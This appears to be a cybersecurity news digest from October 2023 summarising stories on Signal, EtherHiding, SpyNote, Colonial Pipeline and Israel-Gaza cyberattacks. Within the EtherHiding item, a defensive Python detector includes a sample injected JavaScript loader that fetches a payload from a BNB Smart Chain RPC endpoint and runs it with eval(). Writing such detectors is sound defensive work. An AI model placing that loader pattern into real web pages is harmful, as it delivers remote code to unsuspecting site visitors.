Daily Drop (626): Signal: 0-Day Debunked, Israel-Hamas: GPS Jamming, EtherHiding, Colonial Pipeline, US GOV: Seized Crypto, Israel-Gaza: Cyberattacks, Canon's Quantum Leap, or Is This the End for Russia?
10-16-23
Monday, Oct 16, 2023 // (IG): BB // Can China Bail Out Putin?
Signal Stands Firm: Debunks Alleged Zero-Day Vulnerability Reports
Bottom Line Up Front (BLUF): Signal, the encrypted messaging app, refutes claims of a zero-day vulnerability in its software. The company's investigation found no evidence to support the alleged flaw, and it received no valid information from official reporting channels or the U.S. government. This development highlights the ongoing challenges in securing messaging apps.
Analyst Comments: Amnesty International recently reported that spyware attacks have targeted journalists, politicians, and academics across regions like the European Union, the U.S., and Asia. These attacks aim to deploy spyware such as Predator, developed by the Intellexa alliance, through deceptive tactics on social media platforms like Twitter and Facebook. Predator spyware enables the surveillance of infected devices, including access to sensitive data like photos, location information, chat messages, and microphone recordings. The spread of this malware is facilitated by Intellexa's "Cyber Operation Platform." Additionally, commercial surveillance vendors are exploring unconventional methods, such as weaponizing digital advertising, to infect mobile devices worldwide via ad networks.
FROM THE MEDIA: Signal, a renowned encrypted messaging app, has firmly denied the existence of a zero-day vulnerability in its software. Despite viral reports suggesting a security flaw that could provide complete access to mobile devices, Signal's investigation found no evidence to substantiate these claims. Notably, the company also sought verification from the U.S. government, which similarly had no information to validate the alleged vulnerability. In response to this incident, Signal has encouraged individuals with credible information to report such findings to security@signal[.]org. As a precautionary measure, users have been advised to disable link previews within the app's settings, thereby reducing potential risks associated with the alleged vulnerability. This revelation comes at a time when the market for zero-day vulnerabilities in messaging apps, including WhatsApp, is thriving, with prices ranging from $1.7 million to $8 million. Nation-state threat actors often exploit such flaws to gain access to targeted devices, enabling remote code execution and covert surveillance.
READ THE STORY: THN
Surge in GPS Jamming Amid Israel-Hamas Conflict Raises Civilian Concerns
Bottom Line Up Front (BLUF): The ongoing conflict between Israel and Hamas has witnessed a surge in GPS jamming activities, driven primarily by Hamas's efforts to disrupt Israeli communication systems. This development underscores the growing role of jamming GPS and communication networks in modern warfare, affecting not only military precision but also civilian applications, including commercial flights. With airlines reducing services and regulatory bodies advising caution in the region's airspace, the repercussions of this conflict extend far beyond the battlefield, emphasizing the urgent need for security assessments and alternative positioning, navigation, and timing (PNT) systems to safeguard civilian interests.
Analyst Comments: The ongoing conflict between Israel and Hamas has witnessed a pronounced increase in GPS jamming activities, with Hamas actively targeting Israeli communication systems. This development underscores the growing role of GPS and communication networks in modern warfare scenarios, where precision and coordination are paramount. PNT services play a pivotal role not only in military operations but also in various civilian applications, making them a prime target in conflicts. The Middle East, known for its susceptibility to jamming and spoofing, now faces disruptions that extend beyond security concerns. These disruptions have resulted in regional instability and have even impacted commercial aviation. Regulatory bodies, including the Federal Aviation Administration and the European Union Aviation Safety Agency, have issued advisories to airlines operating in the region, leading to flight cancellations and suspensions.
FROM THE MEDIA: During the Israel-Hamas conflict, a significant uptick in GPS interference has occurred due to Hamas's jamming of Israeli communication systems. This highlights the significance of PNT services in modern warfare and the critical need for precision and coordination. Such services are essential for military operations and civilian applications. Recent disruptions in the Middle East, including alleged Russian interference in Syria, have prompted cautionary measures by aviation authorities, impacting commercial flights in the region. This escalation extends implications far beyond the battlefield.
READ THE STORY: Haaretz // GPS World
Canon's Quantum Leap: Can Nanoimprint Lithography Challenge ASML's Dominance?
Bottom Line Up Front (BLUF): Canon's announcement of nanoimprint lithography (NIL) capable of 5nm chip production has the potential to disrupt ASML's market dominance. However, skepticism lingers regarding the technology's readiness and practicality, while export control considerations add another layer of complexity.
Analyst Comments: The practicality and commercial impact of NIL are expected to take at least five years to materialize, with initial adoption likely focused on memory chips. Transitioning to high-volume execution and manufacturing readiness remains a significant hurdle. Nonetheless, the potential disruption of chip manufacturing warrants attention. Organizations in the semiconductor industry should closely monitor developments in NIL, prepare for potential shifts in the market, and consider the implications of export controls in a rapidly evolving landscape. The competition between Canon and ASML may ultimately reshape the semiconductor manufacturing landscape, but it is a transformation that will unfold over several years, not months.
FROM THE MEDIA: In the realm of advanced chip manufacturing, Dutch giant ASML has been the uncontested leader for years. Yet Canon, primarily known for high-end camera systems, recently introduced nanoimprint lithography (NIL) technology, claiming the capability to produce 5nm chips, with potential refinement down to 2nm. This places Canon in direct competition with ASML's extreme ultraviolet lithography (EUV) technology, the exclusive choice for sub-7nm chip manufacturing. Canon's NIL technology offers a unique advantage in that it does not rely on the complex optics and mirrors used in EUV, potentially bypassing US restrictions on exports of high-end chipmaking equipment to China. This is particularly significant given the US pressure on allies like Korea, Japan, and the Netherlands to limit such exports.
READ THE STORY: The Register
Binance's Smart Chain Exploited in New 'EtherHiding' Malware Campaign
Bottom Line Up Front (BLUF): A sophisticated malware campaign known as "EtherHiding" has emerged, leveraging Binance's Smart Chain (BSC) contracts to distribute malicious code. Guardio Labs identified this campaign, which has evolved into a highly resilient form of malware distribution. The attackers initially targeted WordPress sites, tricking visitors with fake browser update warnings that ultimately led to the deployment of information-stealing malware. Notably, the attackers have shifted to using BSC, benefiting from its decentralized and anonymous nature. Once infected, websites are injected with obfuscated JavaScript, creating a smart contract that queries the BNB Smart Chain to fetch a malicious payload from a command-and-control server. Victims are lured into downloading malicious executables from legitimate file hosting services.
Analyst Comments: The "EtherHiding" malware campaign represents a new level of sophistication in malware distribution. By exploiting Binance's Smart Chain, threat actors have created a resilient method of serving malicious code. This campaign's evolution involves compromising WordPress sites, a common target for attackers, by presenting fake browser updates to visitors. The use of obfuscated JavaScript and smart contracts on the BNB Smart Chain adds a layer of complexity, making it difficult to detect and disrupt the attack. Victims who unknowingly click on the fake update buttons are directed to download malicious files from legitimate hosting services. The decentralized nature of this approach, while advantageous for attackers, poses significant challenges for mitigation efforts. As such, it is essential for website owners to follow security best practices, including regular updates, user management, and robust passwords, to minimize the risk of falling victim to such attacks.
FROM THE MEDIA: A sophisticated malware campaign known as "EtherHiding" has emerged, leveraging Binance's Smart Chain (BSC) contracts to distribute malicious code. Guardio Labs identified this campaign, which has evolved into a highly resilient form of malware distribution. The attackers initially targeted WordPress sites, tricking visitors with fake browser update warnings that ultimately led to the deployment of information-stealing malware. Notably, the attackers have shifted to using BSC, benefiting from its decentralized and anonymous nature. Once infected, websites are injected with obfuscated JavaScript, creating a smart contract that queries the BNB Smart Chain to fetch a malicious payload from a command-and-control server. Victims are lured into downloading malicious executables from legitimate file hosting services.
READ THE STORY: THN
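A defender-side illustration of the mechanism described above: the injected script reads its next stage from a BSC contract over JSON-RPC and then executes what it fetched. The scanner below is an added example, not Guardio Labs' code or indicators; the RPC hostnames, contract address and calldata are assumptions constructed for the sample page, and the heuristic is a starting point for content scanning of a site's pages, not a complete signature.

```python
"""Heuristic detector for EtherHiding-style script injections.

Added example (not Guardio Labs' code or IoCs): flags inline <script>
blocks that read a payload from a BNB Smart Chain contract via JSON-RPC
eth_call and then execute it.  Indicator lists are illustrative assumptions.
"""
import re
from html.parser import HTMLParser

# Assumed indicators, constructed for this example.  Public BSC RPC hostnames
# change over time; treat this list as a starting point, not a complete one.
INDICATORS = {
    "bsc_rpc_endpoint": re.compile(
        r"bsc-dataseed\d*\.(?:binance\.org|defibit\.io|ninicoin\.io)", re.I),
    "eth_call": re.compile(r"\beth_call\b"),
    "jsonrpc_body": re.compile(r"jsonrpc\s*[:=]\s*['\"]2\.0['\"]"),
    "hex_calldata": re.compile(r"0x[0-9a-f]{8,}", re.I),
    "dynamic_eval": re.compile(
        r"\b(?:eval|Function)\s*\(|document\.write\s*\(|\.appendChild\s*\("),
}
# A script is flagged only when it both reads from the chain and executes code.
REQUIRED = ("bsc_rpc_endpoint", "eth_call", "dynamic_eval")


class _ScriptCollector(HTMLParser):
    """Collects the text of every inline <script> element in document order."""

    def __init__(self):
        super().__init__()
        self.scripts = []
        self._buf = None

    def handle_starttag(self, tag, attrs):
        if tag == "script":
            self._buf = []

    def handle_endtag(self, tag):
        if tag == "script" and self._buf is not None:
            self.scripts.append("".join(self._buf))
            self._buf = None

    def handle_data(self, data):
        if self._buf is not None:
            self._buf.append(data)


def match_indicators(script_src):
    """Return the sorted names of indicators present in one script body."""
    return sorted(name for name, rx in INDICATORS.items() if rx.search(script_src))


def scan_html(html):
    """Return [(script_index, indicators)] for scripts meeting every REQUIRED indicator."""
    parser = _ScriptCollector()
    parser.feed(html)
    hits = []
    for i, src in enumerate(parser.scripts):
        found = match_indicators(src)
        if all(r in found for r in REQUIRED):
            hits.append((i, found))
    return hits


# Constructed sample page: one benign analytics snippet, one injected loader.
# The contract address and calldata are placeholders, not real indicators.
SAMPLE_HTML = """<html><head>
<script>window.dataLayer=window.dataLayer||[];function gtag(){dataLayer.push(arguments);}</script>
</head><body><h1>Site</h1>
<script>
(function(){var r="https://bsc-dataseed1.binance.org/";
var b={jsonrpc:"2.0",id:1,method:"eth_call",
params:[{to:"0x0000000000000000000000000000000000000000",data:"0x3bc5de30"},"latest"]};
fetch(r,{method:"POST",body:JSON.stringify(b)}).then(x=>x.json())
.then(j=>{eval(decodeURIComponent(j.result));});})();
</script>
</body></html>"""

if __name__ == "__main__":
    for idx, found in scan_html(SAMPLE_HTML):
        print(f"script #{idx} flagged: {', '.join(found)}")
```

Run it against pages pulled from a site's own origin; a hit on a page whose scripts are otherwise static is a strong signal that the template or a plugin has been modified.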
Colonial Pipeline Dismisses Ransomware Claims as Unrelated Data Breach
Bottom Line Up Front (BLUF): Colonial Pipeline, the operator of the largest refined oil products pipeline system in the U.S., has refuted claims by the Ransomed.vc gang of a ransomware attack on their systems. The company confirmed that there has been no disruption to pipeline operations, and their systems remain secure. Colonial Pipeline attributes the incident to a third-party data breach, unrelated to their own operations, following an assessment by their security and technology teams in collaboration with CISA.
Analyst Comments: Colonial Pipeline, known for its extensive pipeline network for refined oil products in the United States, responded to claims made by the Ransomed.vc gang regarding a security incident. The gang had alleged that they successfully compromised Colonial Pipeline's systems and had stolen data. However, after thorough assessment by Colonial Pipeline's security and technology teams, in coordination with the Cybersecurity and Infrastructure Security Agency (CISA), the company confirmed that there has been no disruption to pipeline operations and that their systems are secure. The files shared by the gang were deemed to be part of a third-party data breach, unrelated to Colonial Pipeline's operations. Further details about the third party involved and the extent of the breach were not disclosed.
FROM THE MEDIA: Colonial Pipeline's swift response to the recent claims of a ransomware attack demonstrates the increased vigilance in the energy sector following the high-profile 2021 incident. The company's collaboration with CISA and its security and technology teams highlights the importance of coordinated responses to potential cyber threats. While the Ransomed.vc gang's claims may have caused concern, Colonial Pipeline's assessment suggests that the incident was unrelated to their systems and operations. This incident serves as a reminder of the ongoing threats faced by critical infrastructure organizations and the need for continuous cybersecurity measures to protect against potential disruptions.
READ THE STORY: The Record
SpyNote Android Trojan: A Stealthy Threat with Information-Gathering Capabilities
Bottom Line Up Front (BLUF): SpyNote, a notorious Android banking trojan, has been dissected to reveal its sophisticated information-gathering features. Spread through SMS phishing campaigns, this malware hides its presence on infected devices and leverages accessibility permissions to record audio, phone calls and keystrokes, and to capture screenshots. Victims attempting to uninstall the malicious app are met with obstacles, highlighting the need for enhanced mobile security.
Analyst Comments: One of SpyNote's notable features is its exploitation of accessibility permissions, which it gains after launching via an external trigger. This access is then leveraged to acquire additional permissions for recording audio, phone calls, logging keystrokes, and capturing screenshots using the MediaProjection API. The malware further fortifies itself by implementing diehard services designed to resist termination attempts by both victims and the operating system.
FROM THE MEDIA: SpyNote, a well-known Android banking trojan, has once again raised concerns due to its intricate information-gathering capabilities. This malware is typically distributed through SMS phishing campaigns, luring potential victims into installing the malicious app via embedded links. What sets SpyNote apart is its ability to request invasive permissions, including access to call logs, camera, SMS messages, and external storage. Moreover, it employs stealthy tactics to avoid detection, such as concealing itself from the Android home screen and Recents screen. One of SpyNote's notable features is its exploitation of accessibility permissions, which it gains after launching via an external trigger. This access is then leveraged to acquire additional permissions for recording audio, phone calls, logging keystrokes, and capturing screenshots using the MediaProjection API. The malware further fortifies itself by implementing diehard services designed to resist termination attempts by both victims and the operating system.
READ THE STORY: THN
US Government Holds $5 Billion in Seized Bitcoin: Impact on Cryptocurrency Market and Legal Challenges
Bottom Line Up Front (BLUF): With over 200,000 BTC amassed from cybercriminal seizures, the US Government controls a staggering $5 billion worth of cryptocurrency. While a portion has been sold off, the government's cautious approach is driven by complex legal processes rather than profit motives, prompting scrutiny of cryptocurrency regulations and market dynamics.
Analyst Comments: The US government's accumulation of Bitcoin through cybercriminal seizures sheds light on the cryptocurrency's dual role as both a tool for illicit activities and a subject of government scrutiny. The government's decision not to exploit these assets for profit highlights its commitment to adhering to established legal procedures and due process. This complex situation underscores the importance of robust cybersecurity measures in the cryptocurrency realm to prevent theft and fraudulent activities. The substantial Bitcoin holdings controlled by the government also prompt discussions about the broader implications for cryptocurrency regulations and enforcement.
FROM THE MEDIA: In a significant development, the US government has found itself in possession of more than $5 billion worth of Bitcoin, the result of extensive seizures linked to cybercriminal activities. This sizable cryptocurrency reserve, comprising over 200,000 BTC, is under the purview of agencies such as the Justice Department and the IRS. Despite selling a portion, reports suggest that the actual holding may be larger than initially estimated. The cryptocurrency community is closely monitoring this situation, as any potential sale or movement of Bitcoin by the government could have a profound impact on the cryptocurrency market. It is important to note that the government's intention is not to generate profits from these assets, but rather to navigate lengthy legal processes, including court orders, for their management and potential liquidation. This development underscores the ongoing battle against cybercrime and raises questions about cryptocurrency regulations and enforcement.
READ THE STORY: CryptoTimes
Cyberattacks Escalate in Israel-Gaza Conflict as Hackers Sympathetic to Hamas Join the Fray
Bottom Line Up Front (BLUF): The Israel-Gaza conflict has seen an uptick in cyberattacks, as hackers sympathetic to Hamas attempt to make it a battleground for cyberwarfare. Hacking groups associated with Iran and Russia have launched various cyberattacks and online campaigns against Israel, aiming to augment the ongoing physical conflict. While the extent and effectiveness of these attacks remain unclear, they underscore the growing role of cyber operations in modern conflicts. The affiliations of these hacking groups may offer insights into potential state support for Hamas. Israel's advanced cybersecurity capabilities pose a significant challenge for cyber adversaries.
Analyst Comments: The use of cyberattacks in conjunction with traditional warfare is becoming a prominent feature of modern conflicts. While the immediate impact of these cyberattacks on Israel is limited, they demonstrate a shift in tactics and a growing awareness of the importance of cyber operations in warfare. The affiliations of hacking groups may indicate indirect state involvement, highlighting the complex dynamics of state-sponsored cyber operations. As the Israel-Gaza conflict continues, the cybersecurity landscape remains dynamic, with the potential for further cyber escalation. The ability to coordinate cyberattacks with physical actions presents new challenges for defense and intelligence agencies. It underscores the need for continued vigilance and investment in cybersecurity capabilities to safeguard critical infrastructure and national security.
FROM THE MEDIA: In recent weeks, hacking groups with links to countries such as Iran and Russia have initiated a series of cyberattacks and online campaigns against Israel amid the Israel-Gaza conflict. These cyberattacks coincide with the physical conflict and have targeted various Israeli entities, including government websites, the electric grid, a rocket alert app, and even the Iron Dome missile defense system. While the extent and impact of these cyberattacks remain uncertain, they demonstrate a concerted effort to combine digital tactics with traditional warfare, similar to how Russia employed cyberattacks alongside military actions in Ukraine. Liz Wu, a spokesperson for the Israel-based cybersecurity firm Check Point Software, reported that more than 40 hacking groups launched attacks, disrupting over 80 websites during the early days of the conflict. These attacks affected government and media websites. Given the low internet connectivity in Gaza and the ongoing Israeli actions, these cyberattacks are believed to originate from outside Gaza.
READ THE STORY: Politico
Items of interest
Sri Lanka Urges Unity to Counter Anti-China Propaganda Amid Belt and Road Initiative Discussions
Bottom Line Up Front (BLUF): Progressive forces in Sri Lanka have been urged to collaborate and launch a campaign aimed at countering anti-China propaganda disseminated by imperialist entities. This call comes during discussions on China's Belt and Road Initiative (BRI). Lanka Sama Samaja Party (LSSP) leader Prof. Tissa Vitharana emphasized that China's rise as a superpower has been achieved without resorting to imperialism, despite ongoing propaganda campaigns against it. He stressed the need for unity among progressive forces to debunk false claims and called on the government to address these allegations effectively.
Analyst Comments: Prof. Tissa Vitharana's call for unity against anti-China propaganda reflects the growing importance of information warfare and diplomacy in contemporary global politics. As Sri Lanka participates in discussions regarding China's Belt and Road Initiative, it is essential for stakeholders to address misinformation and ensure that accurate information is disseminated. The emphasis on transparent and productive use of borrowed funds aligns with responsible financial practices. Encouraging FTAs with major economies like China and India can be a strategic move to stimulate economic growth and cooperation. Overall, this discussion highlights the evolving dynamics of international relations in the context of infrastructure and economic development initiatives.
FROM THE MEDIA: During a recent discussion on the Belt and Road Initiative (BRI), Lanka Sama Samaja Party (LSSP) leader Prof. Tissa Vitharana urged progressive forces in Sri Lanka to join forces in combating anti-China propaganda. Organized by the Asia Progress Forum, which is affiliated with the Communist Party of Sri Lanka (CPSL), the event aimed to shed light on China's BRI and its potential benefits. Prof. Vitharana highlighted that despite baseless allegations and misinformation, China has emerged as a superpower without adopting imperialist strategies. He specifically mentioned the false narrative of a 'Chinese debt trap' and emphasized the importance of uniting to counter such disinformation. Additionally, he called on the government to take proactive steps to address and counterbalance these unfounded claims.
READ THE STORY: The Island
What the HELL is Year Hare Affair? (China's UNHINGED Propaganda Cartoon) (Video)
FROM THE MEDIA: Year Hare Affair (Chinese: 那年那兔那些事(儿); lit. 'Those stories of that rabbit that happened in those years') is a Chinese webcomic and media franchise by Lin Chao (林超), initially under the pen name "逆光飞行" (Pinyin: Nìguāng Fēixíng, lit. "flight against the light"). The comic uses anthropomorphic animals as an allegory for nations and sovereign states to represent 20th century political, military and diplomatic events.
Why Is Chinese Propaganda So Successful (Video)
FROM THE MEDIA: The Chinese Communist Party spends massively on its propaganda, and that's because it knows it gets good returns. In this episode of China Uncensored, we look at common tactics propagandists use to change your mind about China, what some of their talking points are, and Western media's role in portraying the CCP in a positive and false light.
These open-source products are reviewed by analysts at InfoDom Securities, providing possible context about current media trends related to the realm of cyber security. The stories selected cover a broad array of cyber threats and are intended to aid readers in framing key publicly discussed threats and overall situational awareness. InfoDom Securities does not endorse any third-party claims made in their original material or related links on their sites; the opinions expressed by third parties are theirs alone. For further questions, please contact InfoDom Securities at dominanceinformation@gmail.com.